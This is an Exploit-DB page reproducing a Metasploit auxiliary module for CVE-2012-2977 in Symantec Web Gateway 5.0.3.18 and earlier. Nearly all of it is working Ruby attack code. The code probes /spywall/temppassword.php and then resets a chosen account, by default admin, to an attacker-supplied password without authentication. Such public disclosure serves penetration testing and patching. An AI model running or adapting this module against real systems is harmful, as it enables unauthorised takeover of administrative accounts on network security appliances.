Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)

EDB-ID:

20706

CVE:

2012-2977

EDB Verified:

Author:

Kc57

Type:

webapps

Exploit:   /  

Platform:

Linux

Date:

2012-08-21

Vulnerable App: 
##
# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
			'Description'    => %q{
					This module will change the password for the specified account on a Symantec Web Gatewaye server.
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision: 0 $",
			'Author'         =>
				[
					'Kc57',
				],
			'References'     =>
				[
					[ 'CVE', '2012-2977' ],
					[ 'OSVDB', '0' ],
					[ 'BID', '54430' ],
					[ 'URL', 'https://www.securityfocus.com/bid/54430' ],
				],
			'DisclosureDate' => "Jul 23 2012" ))

			register_options(
				[
					Opt::RPORT(80),
					OptString.new('USER', [ true, 'The password to reset to', 'admin']),
					OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
				], self.class)
	end

	def run

		print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
		res = send_request_raw(
		{
			'method'  => 'POST',
			'uri'     => '/spywall/temppassword.php',
		}, 25)

		#check to see if we get HTTP OK
		if (res.code == 200)
			print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
		else
			print_error("Did not get HTTP 200, URL was not found. Exiting!")
			return
		end

		#Check to if the temppassword.php page loads or if we are redirected to the login page
		if (res.body.match(/Please Select a New Password/i))
			print_status("Server is vulnerable!")
		else
			print_error("Target doesn't seem to be vulnerable!")
			return
		end

		print_status("Attempting to exploit password change vulnerability on #{rhost}")
		print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")

		data  = 'target=executive_summary.php'
		data << '&USERNAME=' + datastore['USER']
		data << '&password=' + datastore['PASSWORD']
		data << '&password2=' + datastore['PASSWORD']
		data << '&Save=Save'

		res = send_request_cgi(
		{
			'method'  => 'POST',
			'uri'     => '/spywall/temppassword.php',
			'data'    => data,
		}, 25)

		if res.code == 200
			if (res.body.match(/Thank you/i))
				print_status("Password reset was successful!\n")
			else
				print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
			end
		else
			print_error("Password reset failed!")
		end
	end

end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services